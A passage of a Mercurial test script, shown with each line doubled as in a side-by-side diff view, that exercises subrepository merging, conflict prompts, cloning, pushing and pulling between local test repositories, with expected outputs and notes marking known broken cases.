257 $ hg merge 5 # test adding
258 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
258 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
259 (branch merge, don't forget to commit)
259 (branch merge, don't forget to commit)
260 $ hg debugsub
260 $ hg debugsub
261 path s
261 path s
262 source s
262 source s
263 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
263 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
264 path t
264 path t
265 source t
265 source t
266 revision 60ca1237c19474e7a3978b0dc1ca4e6f36d51382
266 revision 60ca1237c19474e7a3978b0dc1ca4e6f36d51382
267 $ hg ci -m9
267 $ hg ci -m9
268 created new head
268 created new head
269 $ hg merge 6 --debug # test change
269 $ hg merge 6 --debug # test change
270 searching for copies back to rev 2
270 searching for copies back to rev 2
271 resolving manifests
271 resolving manifests
272 branchmerge: True, force: False, partial: False
272 branchmerge: True, force: False, partial: False
273 ancestor: 1f14a2e2d3ec, local: f0d2028bf86d+, remote: 1831e14459c4
273 ancestor: 1f14a2e2d3ec, local: f0d2028bf86d+, remote: 1831e14459c4
274 starting 4 threads for background file closing (?)
274 starting 4 threads for background file closing (?)
275 .hgsubstate: versions differ -> m (premerge)
275 .hgsubstate: versions differ -> m (premerge)
276 subrepo merge f0d2028bf86d+ 1831e14459c4 1f14a2e2d3ec
276 subrepo merge f0d2028bf86d+ 1831e14459c4 1f14a2e2d3ec
277 subrepo t: other changed, get t:6747d179aa9a688023c4b0cad32e4c92bb7f34ad:hg
277 subrepo t: other changed, get t:6747d179aa9a688023c4b0cad32e4c92bb7f34ad:hg
278 getting subrepo t
278 getting subrepo t
279 resolving manifests
279 resolving manifests
280 branchmerge: False, force: False, partial: False
280 branchmerge: False, force: False, partial: False
281 ancestor: 60ca1237c194, local: 60ca1237c194+, remote: 6747d179aa9a
281 ancestor: 60ca1237c194, local: 60ca1237c194+, remote: 6747d179aa9a
282 t: remote is newer -> g
282 t: remote is newer -> g
283 getting t
283 getting t
284 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
284 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
285 (branch merge, don't forget to commit)
285 (branch merge, don't forget to commit)
286 $ hg debugsub
286 $ hg debugsub
287 path s
287 path s
288 source s
288 source s
289 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
289 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
290 path t
290 path t
291 source t
291 source t
292 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
292 revision 6747d179aa9a688023c4b0cad32e4c92bb7f34ad
293 $ echo conflict > t/t
293 $ echo conflict > t/t
294 $ hg ci -m10
294 $ hg ci -m10
295 committing subrepository t
295 committing subrepository t
296 $ HGMERGE=internal:merge hg merge --debug 7 # test conflict
296 $ HGMERGE=internal:merge hg merge --debug 7 # test conflict
297 searching for copies back to rev 2
297 searching for copies back to rev 2
298 resolving manifests
298 resolving manifests
299 branchmerge: True, force: False, partial: False
299 branchmerge: True, force: False, partial: False
300 ancestor: 1831e14459c4, local: e45c8b14af55+, remote: f94576341bcf
300 ancestor: 1831e14459c4, local: e45c8b14af55+, remote: f94576341bcf
301 starting 4 threads for background file closing (?)
301 starting 4 threads for background file closing (?)
302 .hgsubstate: versions differ -> m (premerge)
302 .hgsubstate: versions differ -> m (premerge)
303 subrepo merge e45c8b14af55+ f94576341bcf 1831e14459c4
303 subrepo merge e45c8b14af55+ f94576341bcf 1831e14459c4
304 subrepo t: both sides changed
304 subrepo t: both sides changed
305 subrepository t diverged (local revision: 20a0db6fbf6c, remote revision: 7af322bc1198)
305 subrepository t diverged (local revision: 20a0db6fbf6c, remote revision: 7af322bc1198)
306 starting 4 threads for background file closing (?)
306 starting 4 threads for background file closing (?)
307 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
307 (M)erge, keep (l)ocal [working copy] or keep (r)emote [merge rev]? m
308 merging subrepository "t"
308 merging subrepository "t"
309 searching for copies back to rev 2
309 searching for copies back to rev 2
310 resolving manifests
310 resolving manifests
311 branchmerge: True, force: False, partial: False
311 branchmerge: True, force: False, partial: False
312 ancestor: 6747d179aa9a, local: 20a0db6fbf6c+, remote: 7af322bc1198
312 ancestor: 6747d179aa9a, local: 20a0db6fbf6c+, remote: 7af322bc1198
313 preserving t for resolve of t
313 preserving t for resolve of t
314 starting 4 threads for background file closing (?)
314 starting 4 threads for background file closing (?)
315 t: versions differ -> m (premerge)
315 t: versions differ -> m (premerge)
316 picked tool ':merge' for t (binary False symlink False changedelete False)
316 picked tool ':merge' for t (binary False symlink False changedelete False)
317 merging t
317 merging t
318 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
318 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
319 t: versions differ -> m (merge)
319 t: versions differ -> m (merge)
320 picked tool ':merge' for t (binary False symlink False changedelete False)
320 picked tool ':merge' for t (binary False symlink False changedelete False)
321 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
321 my t@20a0db6fbf6c+ other t@7af322bc1198 ancestor t@6747d179aa9a
322 warning: conflicts while merging t! (edit, then use 'hg resolve --mark')
322 warning: conflicts while merging t! (edit, then use 'hg resolve --mark')
323 0 files updated, 0 files merged, 0 files removed, 1 files unresolved
323 0 files updated, 0 files merged, 0 files removed, 1 files unresolved
324 use 'hg resolve' to retry unresolved file merges or 'hg update -C .' to abandon
324 use 'hg resolve' to retry unresolved file merges or 'hg update -C .' to abandon
325 subrepo t: merge with t:7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4:hg
325 subrepo t: merge with t:7af322bc1198a32402fe903e0b7ebcfc5c9bf8f4:hg
326 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
326 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
327 (branch merge, don't forget to commit)
327 (branch merge, don't forget to commit)
328
328
329 should conflict
329 should conflict
330
330
331 $ cat t/t
331 $ cat t/t
332 <<<<<<< local: 20a0db6fbf6c - test: 10
332 <<<<<<< local: 20a0db6fbf6c - test: 10
333 conflict
333 conflict
334 =======
334 =======
335 t3
335 t3
336 >>>>>>> other: 7af322bc1198 - test: 7
336 >>>>>>> other: 7af322bc1198 - test: 7
337
337
338 11: remove subrepo t
338 11: remove subrepo t
339
339
340 $ hg co -C 5
340 $ hg co -C 5
341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
341 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
342 $ hg revert -r 4 .hgsub # remove t
342 $ hg revert -r 4 .hgsub # remove t
343 $ hg ci -m11
343 $ hg ci -m11
344 created new head
344 created new head
345 $ hg debugsub
345 $ hg debugsub
346 path s
346 path s
347 source s
347 source s
348 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
348 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
349
349
350 local removed, remote changed, keep changed
350 local removed, remote changed, keep changed
351
351
352 $ hg merge 6
352 $ hg merge 6
353 remote [merge rev] changed subrepository t which local [working copy] removed
353 remote [merge rev] changed subrepository t which local [working copy] removed
354 use (c)hanged version or (d)elete? c
354 use (c)hanged version or (d)elete? c
355 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
355 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
356 (branch merge, don't forget to commit)
356 (branch merge, don't forget to commit)
357 BROKEN: should include subrepo t
357 BROKEN: should include subrepo t
358 $ hg debugsub
358 $ hg debugsub
359 path s
359 path s
360 source s
360 source s
361 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
361 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
362 $ cat .hgsubstate
362 $ cat .hgsubstate
363 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
363 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
364 6747d179aa9a688023c4b0cad32e4c92bb7f34ad t
364 6747d179aa9a688023c4b0cad32e4c92bb7f34ad t
365 $ hg ci -m 'local removed, remote changed, keep changed'
365 $ hg ci -m 'local removed, remote changed, keep changed'
366 BROKEN: should include subrepo t
366 BROKEN: should include subrepo t
367 $ hg debugsub
367 $ hg debugsub
368 path s
368 path s
369 source s
369 source s
370 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
370 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
371 BROKEN: should include subrepo t
371 BROKEN: should include subrepo t
372 $ cat .hgsubstate
372 $ cat .hgsubstate
373 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
373 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
374 $ cat t/t
374 $ cat t/t
375 t2
375 t2
376
376
377 local removed, remote changed, keep removed
377 local removed, remote changed, keep removed
378
378
379 $ hg co -C 11
379 $ hg co -C 11
380 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
380 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
381 $ hg merge --config ui.interactive=true 6 <<EOF
381 $ hg merge --config ui.interactive=true 6 <<EOF
382 > d
382 > d
383 > EOF
383 > EOF
384 remote [merge rev] changed subrepository t which local [working copy] removed
384 remote [merge rev] changed subrepository t which local [working copy] removed
385 use (c)hanged version or (d)elete? d
385 use (c)hanged version or (d)elete? d
386 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
386 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
387 (branch merge, don't forget to commit)
387 (branch merge, don't forget to commit)
388 $ hg debugsub
388 $ hg debugsub
389 path s
389 path s
390 source s
390 source s
391 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
391 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
392 $ cat .hgsubstate
392 $ cat .hgsubstate
393 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
393 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
394 $ hg ci -m 'local removed, remote changed, keep removed'
394 $ hg ci -m 'local removed, remote changed, keep removed'
395 created new head
395 created new head
396 $ hg debugsub
396 $ hg debugsub
397 path s
397 path s
398 source s
398 source s
399 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
399 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
400 $ cat .hgsubstate
400 $ cat .hgsubstate
401 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
401 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
402
402
403 local changed, remote removed, keep changed
403 local changed, remote removed, keep changed
404
404
405 $ hg co -C 6
405 $ hg co -C 6
406 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
406 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
407 $ hg merge 11
407 $ hg merge 11
408 local [working copy] changed subrepository t which remote [merge rev] removed
408 local [working copy] changed subrepository t which remote [merge rev] removed
409 use (c)hanged version or (d)elete? c
409 use (c)hanged version or (d)elete? c
410 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
410 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
411 (branch merge, don't forget to commit)
411 (branch merge, don't forget to commit)
412 BROKEN: should include subrepo t
412 BROKEN: should include subrepo t
413 $ hg debugsub
413 $ hg debugsub
414 path s
414 path s
415 source s
415 source s
416 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
416 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
417 BROKEN: should include subrepo t
417 BROKEN: should include subrepo t
418 $ cat .hgsubstate
418 $ cat .hgsubstate
419 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
419 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
420 $ hg ci -m 'local changed, remote removed, keep changed'
420 $ hg ci -m 'local changed, remote removed, keep changed'
421 created new head
421 created new head
422 BROKEN: should include subrepo t
422 BROKEN: should include subrepo t
423 $ hg debugsub
423 $ hg debugsub
424 path s
424 path s
425 source s
425 source s
426 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
426 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
427 BROKEN: should include subrepo t
427 BROKEN: should include subrepo t
428 $ cat .hgsubstate
428 $ cat .hgsubstate
429 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
429 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
430 $ cat t/t
430 $ cat t/t
431 t2
431 t2
432
432
433 local changed, remote removed, keep removed
433 local changed, remote removed, keep removed
434
434
435 $ hg co -C 6
435 $ hg co -C 6
436 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
436 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
437 $ hg merge --config ui.interactive=true 11 <<EOF
437 $ hg merge --config ui.interactive=true 11 <<EOF
438 > d
438 > d
439 > EOF
439 > EOF
440 local [working copy] changed subrepository t which remote [merge rev] removed
440 local [working copy] changed subrepository t which remote [merge rev] removed
441 use (c)hanged version or (d)elete? d
441 use (c)hanged version or (d)elete? d
442 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
442 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
443 (branch merge, don't forget to commit)
443 (branch merge, don't forget to commit)
444 $ hg debugsub
444 $ hg debugsub
445 path s
445 path s
446 source s
446 source s
447 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
447 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
448 $ cat .hgsubstate
448 $ cat .hgsubstate
449 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
449 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
450 $ hg ci -m 'local changed, remote removed, keep removed'
450 $ hg ci -m 'local changed, remote removed, keep removed'
451 created new head
451 created new head
452 $ hg debugsub
452 $ hg debugsub
453 path s
453 path s
454 source s
454 source s
455 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
455 revision e4ece1bf43360ddc8f6a96432201a37b7cd27ae4
456 $ cat .hgsubstate
456 $ cat .hgsubstate
457 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
457 e4ece1bf43360ddc8f6a96432201a37b7cd27ae4 s
458
458
459 clean up to avoid having to fix up the tests below
459 clean up to avoid having to fix up the tests below
460
460
461 $ hg co -C 10
461 $ hg co -C 10
462 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
462 2 files updated, 0 files merged, 0 files removed, 0 files unresolved
463 $ cat >> $HGRCPATH <<EOF
463 $ cat >> $HGRCPATH <<EOF
464 > [extensions]
464 > [extensions]
465 > strip=
465 > strip=
466 > EOF
466 > EOF
467 $ hg strip -r 11:15
467 $ hg strip -r 11:15
468 saved backup bundle to $TESTTMP/t/.hg/strip-backup/*-backup.hg (glob)
468 saved backup bundle to $TESTTMP/t/.hg/strip-backup/*-backup.hg (glob)
469
469
470 clone
470 clone
471
471
472 $ cd ..
472 $ cd ..
473 $ hg clone t tc
473 $ hg clone t tc
474 updating to branch default
474 updating to branch default
475 cloning subrepo s from $TESTTMP/t/s
475 cloning subrepo s from $TESTTMP/t/s
476 cloning subrepo s/ss from $TESTTMP/t/s/ss (glob)
476 cloning subrepo s/ss from $TESTTMP/t/s/ss (glob)
477 cloning subrepo t from $TESTTMP/t/t
477 cloning subrepo t from $TESTTMP/t/t
478 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
478 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
479 $ cd tc
479 $ cd tc
480 $ hg debugsub
480 $ hg debugsub
481 path s
481 path s
482 source s
482 source s
483 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
483 revision fc627a69481fcbe5f1135069e8a3881c023e4cf5
484 path t
484 path t
485 source t
485 source t
486 revision 20a0db6fbf6c3d2836e6519a642ae929bfc67c0e
486 revision 20a0db6fbf6c3d2836e6519a642ae929bfc67c0e
487
487
488 push
488 push
489
489
490 $ echo bah > t/t
490 $ echo bah > t/t
491 $ hg ci -m11
491 $ hg ci -m11
492 committing subrepository t
492 committing subrepository t
493 $ hg push
493 $ hg push
494 pushing to $TESTTMP/t (glob)
494 pushing to $TESTTMP/t (glob)
495 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
495 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
496 no changes made to subrepo s since last push to $TESTTMP/t/s
496 no changes made to subrepo s since last push to $TESTTMP/t/s
497 pushing subrepo t to $TESTTMP/t/t
497 pushing subrepo t to $TESTTMP/t/t
498 searching for changes
498 searching for changes
499 adding changesets
499 adding changesets
500 adding manifests
500 adding manifests
501 adding file changes
501 adding file changes
502 added 1 changesets with 1 changes to 1 files
502 added 1 changesets with 1 changes to 1 files
503 searching for changes
503 searching for changes
504 adding changesets
504 adding changesets
505 adding manifests
505 adding manifests
506 adding file changes
506 adding file changes
507 added 1 changesets with 1 changes to 1 files
507 added 1 changesets with 1 changes to 1 files
508
508
509 push -f
509 push -f
510
510
511 $ echo bah > s/a
511 $ echo bah > s/a
512 $ hg ci -m12
512 $ hg ci -m12
513 committing subrepository s
513 committing subrepository s
514 $ hg push
514 $ hg push
515 pushing to $TESTTMP/t (glob)
515 pushing to $TESTTMP/t (glob)
516 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
516 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
517 pushing subrepo s to $TESTTMP/t/s
517 pushing subrepo s to $TESTTMP/t/s
518 searching for changes
518 searching for changes
519 abort: push creates new remote head 12a213df6fa9! (in subrepository "s")
519 abort: push creates new remote head 12a213df6fa9! (in subrepository "s")
520 (merge or see 'hg help push' for details about pushing new heads)
520 (merge or see 'hg help push' for details about pushing new heads)
521 [255]
521 [255]
522 $ hg push -f
522 $ hg push -f
523 pushing to $TESTTMP/t (glob)
523 pushing to $TESTTMP/t (glob)
524 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
524 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
525 searching for changes
525 searching for changes
526 no changes found
526 no changes found
527 pushing subrepo s to $TESTTMP/t/s
527 pushing subrepo s to $TESTTMP/t/s
528 searching for changes
528 searching for changes
529 adding changesets
529 adding changesets
530 adding manifests
530 adding manifests
531 adding file changes
531 adding file changes
532 added 1 changesets with 1 changes to 1 files (+1 heads)
532 added 1 changesets with 1 changes to 1 files (+1 heads)
533 pushing subrepo t to $TESTTMP/t/t
533 pushing subrepo t to $TESTTMP/t/t
534 searching for changes
534 searching for changes
535 no changes found
535 no changes found
536 searching for changes
536 searching for changes
537 adding changesets
537 adding changesets
538 adding manifests
538 adding manifests
539 adding file changes
539 adding file changes
540 added 1 changesets with 1 changes to 1 files
540 added 1 changesets with 1 changes to 1 files
541
541
542 check that unmodified subrepos are not pushed
542 check that unmodified subrepos are not pushed
543
543
544 $ hg clone . ../tcc
544 $ hg clone . ../tcc
545 updating to branch default
545 updating to branch default
546 cloning subrepo s from $TESTTMP/tc/s
546 cloning subrepo s from $TESTTMP/tc/s
547 cloning subrepo s/ss from $TESTTMP/tc/s/ss (glob)
547 cloning subrepo s/ss from $TESTTMP/tc/s/ss (glob)
548 cloning subrepo t from $TESTTMP/tc/t
548 cloning subrepo t from $TESTTMP/tc/t
549 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
549 3 files updated, 0 files merged, 0 files removed, 0 files unresolved
550
550
551 the subrepos on the new clone have nothing to push to its source
551 the subrepos on the new clone have nothing to push to its source
552
552
553 $ hg push -R ../tcc .
553 $ hg push -R ../tcc .
554 pushing to .
554 pushing to .
555 no changes made to subrepo s/ss since last push to s/ss (glob)
555 no changes made to subrepo s/ss since last push to s/ss (glob)
556 no changes made to subrepo s since last push to s
556 no changes made to subrepo s since last push to s
557 no changes made to subrepo t since last push to t
557 no changes made to subrepo t since last push to t
558 searching for changes
558 searching for changes
559 no changes found
559 no changes found
560 [1]
560 [1]
561
561
562 the subrepos on the source do not have a clean store versus the clone target
562 the subrepos on the source do not have a clean store versus the clone target
563 because they were never explicitly pushed to the source
563 because they were never explicitly pushed to the source
564
564
565 $ hg push ../tcc
565 $ hg push ../tcc
566 pushing to ../tcc
566 pushing to ../tcc
567 pushing subrepo s/ss to ../tcc/s/ss (glob)
567 pushing subrepo s/ss to ../tcc/s/ss (glob)
568 searching for changes
568 searching for changes
569 no changes found
569 no changes found
570 pushing subrepo s to ../tcc/s
570 pushing subrepo s to ../tcc/s
571 searching for changes
571 searching for changes
572 no changes found
572 no changes found
573 pushing subrepo t to ../tcc/t
573 pushing subrepo t to ../tcc/t
574 searching for changes
574 searching for changes
575 no changes found
575 no changes found
576 searching for changes
576 searching for changes
577 no changes found
577 no changes found
578 [1]
578 [1]
579
579
580 after push their stores become clean
580 after push their stores become clean
581
581
582 $ hg push ../tcc
582 $ hg push ../tcc
583 pushing to ../tcc
583 pushing to ../tcc
584 no changes made to subrepo s/ss since last push to ../tcc/s/ss (glob)
584 no changes made to subrepo s/ss since last push to ../tcc/s/ss (glob)
585 no changes made to subrepo s since last push to ../tcc/s
585 no changes made to subrepo s since last push to ../tcc/s
586 no changes made to subrepo t since last push to ../tcc/t
586 no changes made to subrepo t since last push to ../tcc/t
587 searching for changes
587 searching for changes
588 no changes found
588 no changes found
589 [1]
589 [1]
590
590
591 updating a subrepo to a different revision or changing
591 updating a subrepo to a different revision or changing
592 its working directory does not make its store dirty
592 its working directory does not make its store dirty
593
593
594 $ hg -R s update '.^'
594 $ hg -R s update '.^'
595 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
595 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
596 $ hg push
596 $ hg push
597 pushing to $TESTTMP/t (glob)
597 pushing to $TESTTMP/t (glob)
598 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
598 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
599 no changes made to subrepo s since last push to $TESTTMP/t/s
599 no changes made to subrepo s since last push to $TESTTMP/t/s
600 no changes made to subrepo t since last push to $TESTTMP/t/t
600 no changes made to subrepo t since last push to $TESTTMP/t/t
601 searching for changes
601 searching for changes
602 no changes found
602 no changes found
603 [1]
603 [1]
604 $ echo foo >> s/a
604 $ echo foo >> s/a
605 $ hg push
605 $ hg push
606 pushing to $TESTTMP/t (glob)
606 pushing to $TESTTMP/t (glob)
607 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
607 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
608 no changes made to subrepo s since last push to $TESTTMP/t/s
608 no changes made to subrepo s since last push to $TESTTMP/t/s
609 no changes made to subrepo t since last push to $TESTTMP/t/t
609 no changes made to subrepo t since last push to $TESTTMP/t/t
610 searching for changes
610 searching for changes
611 no changes found
611 no changes found
612 [1]
612 [1]
613 $ hg -R s update -C tip
613 $ hg -R s update -C tip
614 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
614 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
615
615
616 committing into a subrepo makes its store (but not its parent's store) dirty
616 committing into a subrepo makes its store (but not its parent's store) dirty
617
617
618 $ echo foo >> s/ss/a
618 $ echo foo >> s/ss/a
619 $ hg -R s/ss commit -m 'test dirty store detection'
619 $ hg -R s/ss commit -m 'test dirty store detection'
620
620
621 $ hg out -S -r `hg log -r tip -T "{node|short}"`
621 $ hg out -S -r `hg log -r tip -T "{node|short}"`
622 comparing with $TESTTMP/t (glob)
622 comparing with $TESTTMP/t (glob)
623 searching for changes
623 searching for changes
624 no changes found
624 no changes found
625 comparing with $TESTTMP/t/s
625 comparing with $TESTTMP/t/s
626 searching for changes
626 searching for changes
627 no changes found
627 no changes found
628 comparing with $TESTTMP/t/s/ss
628 comparing with $TESTTMP/t/s/ss
629 searching for changes
629 searching for changes
630 changeset: 1:79ea5566a333
630 changeset: 1:79ea5566a333
631 tag: tip
631 tag: tip
632 user: test
632 user: test
633 date: Thu Jan 01 00:00:00 1970 +0000
633 date: Thu Jan 01 00:00:00 1970 +0000
634 summary: test dirty store detection
634 summary: test dirty store detection
635
635
636 comparing with $TESTTMP/t/t
636 comparing with $TESTTMP/t/t
637 searching for changes
637 searching for changes
638 no changes found
638 no changes found
639
639
640 $ hg push
640 $ hg push
641 pushing to $TESTTMP/t (glob)
641 pushing to $TESTTMP/t (glob)
642 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
642 pushing subrepo s/ss to $TESTTMP/t/s/ss (glob)
643 searching for changes
643 searching for changes
644 adding changesets
644 adding changesets
645 adding manifests
645 adding manifests
646 adding file changes
646 adding file changes
647 added 1 changesets with 1 changes to 1 files
647 added 1 changesets with 1 changes to 1 files
648 no changes made to subrepo s since last push to $TESTTMP/t/s
648 no changes made to subrepo s since last push to $TESTTMP/t/s
649 no changes made to subrepo t since last push to $TESTTMP/t/t
649 no changes made to subrepo t since last push to $TESTTMP/t/t
650 searching for changes
650 searching for changes
651 no changes found
651 no changes found
652 [1]
652 [1]
653
653
654 a subrepo store may be clean versus one repo but not versus another
654 a subrepo store may be clean versus one repo but not versus another
655
655
656 $ hg push
656 $ hg push
657 pushing to $TESTTMP/t (glob)
657 pushing to $TESTTMP/t (glob)
658 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
658 no changes made to subrepo s/ss since last push to $TESTTMP/t/s/ss (glob)
659 no changes made to subrepo s since last push to $TESTTMP/t/s
659 no changes made to subrepo s since last push to $TESTTMP/t/s
660 no changes made to subrepo t since last push to $TESTTMP/t/t
660 no changes made to subrepo t since last push to $TESTTMP/t/t
661 searching for changes
661 searching for changes
662 no changes found
662 no changes found
663 [1]
663 [1]
664 $ hg push ../tcc
664 $ hg push ../tcc
665 pushing to ../tcc
665 pushing to ../tcc
666 pushing subrepo s/ss to ../tcc/s/ss (glob)
666 pushing subrepo s/ss to ../tcc/s/ss (glob)
667 searching for changes
667 searching for changes
668 adding changesets
668 adding changesets
669 adding manifests
669 adding manifests
670 adding file changes
670 adding file changes
671 added 1 changesets with 1 changes to 1 files
671 added 1 changesets with 1 changes to 1 files
672 no changes made to subrepo s since last push to ../tcc/s
672 no changes made to subrepo s since last push to ../tcc/s
673 no changes made to subrepo t since last push to ../tcc/t
673 no changes made to subrepo t since last push to ../tcc/t
674 searching for changes
674 searching for changes
675 no changes found
675 no changes found
676 [1]
676 [1]
677
677
678 update
678 update
679
679
680 $ cd ../t
680 $ cd ../t
681 $ hg up -C # discard our earlier merge
681 $ hg up -C # discard our earlier merge
682 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
682 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
683 updated to "c373c8102e68: 12"
683 updated to "c373c8102e68: 12"
684 2 other heads for branch "default"
684 2 other heads for branch "default"
685 $ echo blah > t/t
685 $ echo blah > t/t
686 $ hg ci -m13
686 $ hg ci -m13
687 committing subrepository t
687 committing subrepository t
688
688
689 backout calls revert internally with minimal opts, which should not raise
689 backout calls revert internally with minimal opts, which should not raise
690 KeyError
690 KeyError
691
691
692 $ hg backout ".^" --no-commit
692 $ hg backout ".^" --no-commit
693 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
693 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
694 changeset c373c8102e68 backed out, don't forget to commit.
694 changeset c373c8102e68 backed out, don't forget to commit.
695
695
696 $ hg up -C # discard changes
696 $ hg up -C # discard changes
697 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
697 1 files updated, 0 files merged, 0 files removed, 0 files unresolved
698 updated to "925c17564ef8: 13"
698 updated to "925c17564ef8: 13"
699 2 other heads for branch "default"
699 2 other heads for branch "default"
700
700
701 pull
701 pull
702
702
703 $ cd ../tc
703 $ cd ../tc
704 $ hg pull
704 $ hg pull
705 pulling from $TESTTMP/t (glob)
705 pulling from $TESTTMP/t (glob)
706 searching for changes
706 searching for changes
707 adding changesets
707 adding changesets
708 adding manifests
708 adding manifests
709 adding file changes
709 adding file changes
710 added 1 changesets with 1 changes to 1 files
710 added 1 changesets with 1 changes to 1 files
711 (run 'hg update' to get a working copy)
711 (run 'hg update' to get a working copy)
712
712
713 should pull t
713 should pull t
714
714
715 $ hg incoming -S -r `hg log -r tip -T "{node|short}"`
715 $ hg incoming -S -r `hg log -r tip -T "{node|short}"`
716 comparing with $TESTTMP/t (glob)
716 comparing with $TESTTMP/t (glob)
717 no changes found
717 no changes found
718 comparing with $TESTTMP/t/s
718 comparing with $TESTTMP/t/s
719 searching for changes
719 searching for changes
720 no changes found
720 no changes found
721 comparing with $TESTTMP/t/s/ss
721 comparing with $TESTTMP/t/s/ss
722 searching for changes
722 searching for changes
723 no changes found
723 no changes found
724 comparing with $TESTTMP/t/t
724 comparing with $TESTTMP/t/t
725 searching for changes
725 searching for changes
726 changeset: 5:52c0adc0515a
726 changeset: 5:52c0adc0515a
727 tag: tip
727 tag: tip
728 user: test
728 user: test
729 date: Thu Jan 01 00:00:00 1970 +0000
729 date: Thu Jan 01 00:00:00 1970 +0000
730 summary: 13
730 summary: 13
731
731
732
732
733 $ hg up
733 $ hg up
734 pulling subrepo t from $TESTTMP/t/t
734 pulling subrepo t from $TESTTMP/t/t
735 searching for changes
735 searching for changes
736 adding changesets
736 adding changesets
737 adding manifests
737 adding manifests
738 adding file changes
738 adding file changes
739 added 1 changesets with 1 changes to 1 files
739 added 1 changesets with 1 changes to 1 files
740 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
740 0 files updated, 0 files merged, 0 files removed, 0 files unresolved
741 updated to "925c17564ef8: 13"
741 updated to "925c17564ef8: 13"
742 2 other heads for branch "default"
742 2 other heads for branch "default"
743 $ cat t/t
743 $ cat t/t
744 blah
744 blah
745
745
746 bogus subrepo path aborts
746 bogus subrepo path aborts
747
747
748 $ echo 'bogus=[boguspath' >> .hgsub
748 $ echo 'bogus=[boguspath' >> .hgsub
